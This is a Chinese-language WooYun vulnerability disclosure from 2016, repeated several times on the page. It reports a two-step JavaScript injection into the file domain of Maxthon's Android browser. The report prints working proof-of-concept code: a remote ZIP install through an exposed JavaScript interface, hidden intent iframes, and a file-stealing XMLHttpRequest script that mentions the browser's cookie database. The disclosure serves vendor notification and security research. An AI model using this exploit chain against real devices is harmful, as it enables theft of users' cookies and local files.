傲游浏览器Android 版可远程注入js 代码到file 域获取用户敏感信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187345

漏洞标题：傲游浏览器Android 版可远程注入js 代码到file 域获取用户敏感信息

漏洞作者： Fremy

提交时间：2016-03-22 18:53

修复时间：2016-06-20 19:10

公开时间：2016-06-20 19:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-22：细节已通知厂商并且等待厂商处理中
2016-03-22：厂商已经确认，细节仅向厂商公开
2016-03-25：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-05-16：细节向核心白帽子及相关领域专家公开
2016-05-26：细节向普通白帽子公开
2016-06-05：细节向实习白帽子公开
2016-06-20：细节向公众公开

简要描述：

傲游浏览器两处漏洞组合可以把JS 代码注入到file 域,获取用户敏感信息..

详细说明：

第一处漏洞,浏览器接口没有合理判断可以调用的域,可以利用这个接口下载任意文件

代码路径:com\mx\jsobject\JsObjMxBrowser.class
  @JavascriptInterface
  public void installWebApp(String paramString)
  {
    String str = t.a(paramString);
    p.a(paramString, "/sdcard/webapp/" + str, null);
    u.b("/sdcard/webapp/" + str);
    d.b().a();
    Toast.makeText(this.mContext, "webapp installed", 1).show();
  }

接口将会从指定远程URL 中下载ZIP 解压包然后把数据释放到SD 卡中的webapp 中,如果没有插入SD 卡,那就会把文件释放到设备储存中
Download PoC :

function install() {
                mmbrowser.installWebApp('http://**.**.**.**/test.zip');
        };
        install();

使用效果
1.运行页面

2.webapp 文件夹内的数据

第二处漏洞,使用浏览器的intent 协议让窗口打开下载好的文件

代码路径:com\mx\browser\MxBrowserActivity.class
    if ((paramString.startsWith("intent:")) || (paramString.startsWith("#Intent;")))
    {
      paramString = com.mx.browser.f.o.a(paramString);
      if (paramString == null) {
        break label924;
      }
      try
      {
        startActivity(paramString);
        return true;
      }
      catch (ActivityNotFoundException paramString)
      {
        for (;;)
        {
          paramString.printStackTrace();
        }
      }
    }
...
  public static Intent a(String paramString)
  {
    int k = 0;
    int j = 1;
    Intent localIntent = null;
    int i;
    if (paramString.startsWith("intent:")) {
      i = 1;
    }
    for (;;)
    {
      if (j != 0) {}
      try
      {
        localIntent = Intent.parseUri(paramString, i);
        return localIntent;
      }
      catch (URISyntaxException paramString)
      {
        paramString.printStackTrace();
      }
      i = k;
      if (!paramString.startsWith("#Intent;"))
      {
        j = 0;
        i = k;
      }
    }
    return null;
  }

测试intent PoC :

<iframe width="0" height="0" src="intent:http://**.**.**.**/#Intent;component=com.mx.browser/com.mx.browser.MxBrowserActivity;end"></iframe>

测试intent PoC 执行效果
未执行intent PoC 之前:

执行intent PoC 之后:

于是测试一下打开刚才用installapp 接口下载到本地的文件,顺利执行:

漏洞证明：

漏洞完整的利用过程如下:
第一步,构造好exploit.html ,让exploit.html 去读那些感兴趣的文件(为了方便测试,就读取文件自身的数据):

<html>
<script>
alert(123);
function stealFile(file) {
 var xmlHttpReq = new XMLHttpRequest();
 xmlHttpReq.onreadystatechange = function(){ if(xmlHttpReq.readyState == 4){ alert(xmlHttpReq.responseText); } };
 xmlHttpReq.open("GET", file);
 xmlHttpReq.send(null); 
};
 stealFile('file:///storage/sdcard/webapp/test/test.html');//file:///data/data/com.mx.browser/app_webview/Cookies</script>
test
</html>

然后用ZIP 把exploit.html 打包
接下来写payload.html ,这部分主要是让浏览器下载exploit.html 到本地然后执行

<html>
    <script>
    	function install() {
        	mmbrowser.installWebApp('http://**.**.**.**/test.zip');
        };
        function open_tab_js_in_sdcard() {
            document.write('<iframe width="0" height="0" src="intent:file:///storage/sdcard/webapp/test/test.html#Intent;component=com.mx.browser/com.mx.browser.MxBrowserActivity;end"></iframe>');
        };
        function open_tab_js_in_device() {
            document.write('<iframe width="0" height="0" src="intent:file:///storage/webapp/test/test.html#Intent;component=com.mx.browser/com.mx.browser.MxBrowserActivity;end"></iframe>');
        };
        install();
        setTimeout(function(){},3000);  //  等待要注入的js 代码解压缩之后用浏览器新建标签打开
        open_tab_js_in_sdcard();
        open_tab_js_in_device();
    </script>
</html>

测试URL:http://**.**.**.**/Maxthon_Android_Browser_InjectJSToFile.html
漏洞证明:

浏览器版本:

因为对android 的目录不太熟悉,所以测试都是在BlueStacks 下测试的.真实的漏洞在手机上测试也存在问题,但是目录没有填对所以没有正确执行.

修复方案：

版权声明：转载请注明来源 Fremy@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-03-22 19:08

厂商回复：

非常感谢作者提供的漏洞细节，我们会尽快修复这个漏洞

漏洞评价：

评价

2016-06-06 12:36 | Moonight ( 实习白帽子 | Rank:51 漏洞数:7 | 无线安全攻城狮)

可惜洞主了，这么好的洞才给5分

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187345

漏洞标题：傲游浏览器Android 版可远程注入js 代码到file 域获取用户敏感信息

相关厂商：傲游

漏洞作者： Fremy

提交时间：2016-03-22 18:53

修复时间：2016-06-20 19:10

公开时间：2016-06-20 19:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Fremy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187345

漏洞标题：傲游浏览器Android 版可远程注入js 代码到file 域获取用户敏感信息

相关厂商：傲游

漏洞作者： Fremy

提交时间：2016-03-22 18:53

修复时间：2016-06-20 19:10

公开时间：2016-06-20 19:10

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0187345"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Fremy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：